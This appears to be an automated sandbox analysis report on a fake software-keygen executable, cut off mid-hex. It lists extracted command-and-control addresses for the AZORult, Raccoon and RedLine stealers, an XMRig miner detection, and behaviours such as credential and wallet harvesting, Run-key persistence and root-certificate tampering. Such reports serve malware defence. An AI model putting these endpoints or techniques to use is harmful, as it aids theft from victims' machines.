Analysis
-
max time kernel
1579s -
max time network
1715s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
20-05-2021 20:35
Static task
static1
Behavioral task
behavioral1
Sample
Ccgetmac.Version.3.9.serial.keygen.exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Ccgetmac.Version.3.9.serial.keygen.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Ccgetmac.Version.3.9.serial.keygen.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Ccgetmac.Version.3.9.serial.keygen.exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Ccgetmac.Version.3.9.serial.keygen.exe
Resource
win10v20210408
General
-
Target
Ccgetmac.Version.3.9.serial.keygen.exe
-
Size
9.0MB
-
MD5
6fc07da0a519310b03b1f5d848ca327d
-
SHA1
af5271b735669ec632ecf18eca841c5b3fb1c4d0
-
SHA256
47f381ac61e4b5279863c5fbf577a443554044d0ddb5e0c9f22bca25c9c413b3
-
SHA512
f4c846db325768bc90a91e78d63cf1d8cdd12fc2e83853a20d54569927dd4addab75a0d8786400c12e831989408d42d015ac04d0e1fe47aad49f62ce199dbd17
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
e0aa5b6d2491c503baf06d4cfeb218de1cd41474
-
url4cnc
https://tttttt.me/hbackwoods1
Extracted
redline
ServLyla2
87.251.71.4:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/744-198-0x0000000000400000-0x000000000041C000-memory.dmp family_redline behavioral3/memory/744-199-0x000000000041607E-mapping.dmp family_redline behavioral3/memory/744-200-0x0000000000400000-0x000000000041C000-memory.dmp family_redline -
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral3/memory/2084-191-0x0000000140000000-0x000000014070D000-memory.dmp xmrig behavioral3/memory/2084-192-0x00000001402CED38-mapping.dmp xmrig behavioral3/memory/2084-194-0x0000000140000000-0x000000014070D000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 52 2084 msiexec.exe -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 316 keygen-pr.exe 1632 keygen-step-1.exe 856 keygen-step-5.exe 760 keygen-step-6.exe 852 keygen-step-3.exe 864 keygen-step-4.exe 1548 key.exe 1008 QWjHI.exe 1720 key.exe 744 AddInProcess32.exe 2396 ABCbrow.exe 2604 9364.tmp.exe 2680 B41E.tmp.exe 2700 B547.tmp.exe 656 jg6_6asg.exe -
resource yara_rule behavioral3/memory/656-204-0x0000000000400000-0x00000000005DB000-memory.dmp vmprotect -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkfimGcp8i9v2Mkf.exe B547.tmp.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkfimGcp8i9v2Mkf.exe B547.tmp.exe -
Loads dropped DLL 42 IoCs
pid Process 1508 cmd.exe 1508 cmd.exe 1508 cmd.exe 1508 cmd.exe 1508 cmd.exe 1508 cmd.exe 1508 cmd.exe 316 keygen-pr.exe 316 keygen-pr.exe 316 keygen-pr.exe 316 keygen-pr.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 796 cmd.exe 1548 key.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 2192 regsvr32.exe 760 keygen-step-6.exe 760 keygen-step-6.exe 760 keygen-step-6.exe 760 keygen-step-6.exe 2604 9364.tmp.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 864 keygen-step-4.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2604 9364.tmp.exe 2604 9364.tmp.exe 2604 9364.tmp.exe 2604 9364.tmp.exe 2604 9364.tmp.exe 2604 9364.tmp.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe" B41E.tmp.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run B41E.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2192 regsvr32.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1548 set thread context of 1720 1548 key.exe 43 PID 2680 set thread context of 3028 2680 B41E.tmp.exe 70 PID 2680 set thread context of 2084 2680 B41E.tmp.exe 72 PID 2396 set thread context of 744 2396 ABCbrow.exe 74 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2468 656 WerFault.exe 75 -
Delays execution with timeout.exe 1 IoCs
pid Process 2484 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1612 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "328307822" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B2CE7A91-B9AA-11EB-8DF3-6AD422E6A34B} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0b46f91b74dd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f00000000020000000000106600000001000020000000dd8bbfa5693c8c72546f1e74133d261396ed975d230a674fbe703b59a7c463dd000000000e80000000020000200000000a6622097c14529f268b31de619bed3a43382110e0db4c21d129f050c293059a200000007d2e4da6877ee84607ddb562c1122bdf61fceefaebdf019db707e1c536e2aff940000000f594217182fda5a5612283a8090cc350313c139f66780d091977c5adf2cb0d4fa34371de13d07db83886431624770c207ae506fc95de35e61f992a23a8762dba iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f000000000200000000001066000000010000200000007fbacabbc19488c27e15f7425da3f5a7778035c689d0033201ed9f714a7a4f34000000000e8000000002000020000000ea06c737ad1d8d15ce6e9d68c8dd4003d71ef1bf25bbb7f4a8d99787c3a804f99000000084e8ad37fe18b77ef033505e2a7591531ac488f422fbf8f0ac7e6a22b042d2f9964ba93362a1c90f8b036119c88a88ce158c8567581297a6fdbbe80ea8c3837c3e24a8cb1a814c73c3cc357e63da5aec1c4602d292bfc743843879d2245ee1d2979fb1ad0431c48037826503b76538c591579397f4e1e53d9d1a03039f86fc40ac6ec85821f3b5be188e758f33c4d23a4000000091a3c9815e68a782cb0b752e5b79f731b06128440f33a281484f62d6f19e3c651533d05b3d3c07315559ba6603f3c35de5ded1d40c30c350760c8c09ece21d8e iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 keygen-step-6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 B41E.tmp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a B41E.tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 keygen-step-6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a B41E.tmp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a B41E.tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603